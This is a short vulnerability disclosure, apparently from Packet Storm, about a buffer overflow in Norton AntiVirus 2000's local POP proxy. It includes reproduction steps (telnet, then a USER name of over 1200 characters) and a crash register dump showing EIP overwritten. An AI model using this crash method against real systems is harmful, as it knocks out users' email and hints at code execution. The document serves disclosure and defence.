Remote DoS attack in Symantec's Email protection in NAV2000. The Protection program leaves a pop server running on the local workstation NAV2000 is installed on, which is vulnerable to a buffer overflow in a long user name.
aaccfd8e405ec8b7ba562a2709ab7e65d5140e07269bdaa79017d2aff4dbcb5dHello, I just found somewhat of a problem in Symantec's Email protection
in NAV2000.
The Protection program leaves a pop server running on the local
workstation NAV2000 is installed on.. This server can be crashed somewhat
like this
telnet 1.1.1.1
USER (over 1200 char)
Then, GPF in windows98
POPROXY caused an invalid page fault in
module <unknown> at 0000:31393837.
Registers:
EAX=02bcfcbc CS=017f EIP=31393837 EFLGS=00010246
EBX=02bcfcbc SS=0187 ESP=02ad001c EBP=02ad003c
ECX=02ad00c0 DS=0187 ESI=817538c0 FS=4fbf
EDX=bff76855 ES=0187 EDI=02ad00e8 GS=0000
Bytes at CS:EIP:
Stack dump:
bff76849 02ad00e8 02bcfcbc 02ad0104 02ad00c0 02ad01f4 bff76855 02bcfcbc
02ad00d0 bff87fe9 02ad00e8 02bcfcbc 02ad0104 02ad00c0 31393837 02ad02ac
In the time after the crash user must reboot to regain email function on
Workstation
This as been tested on 3 Machines Win98 SE Win95 rev B and Win95 rev C
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed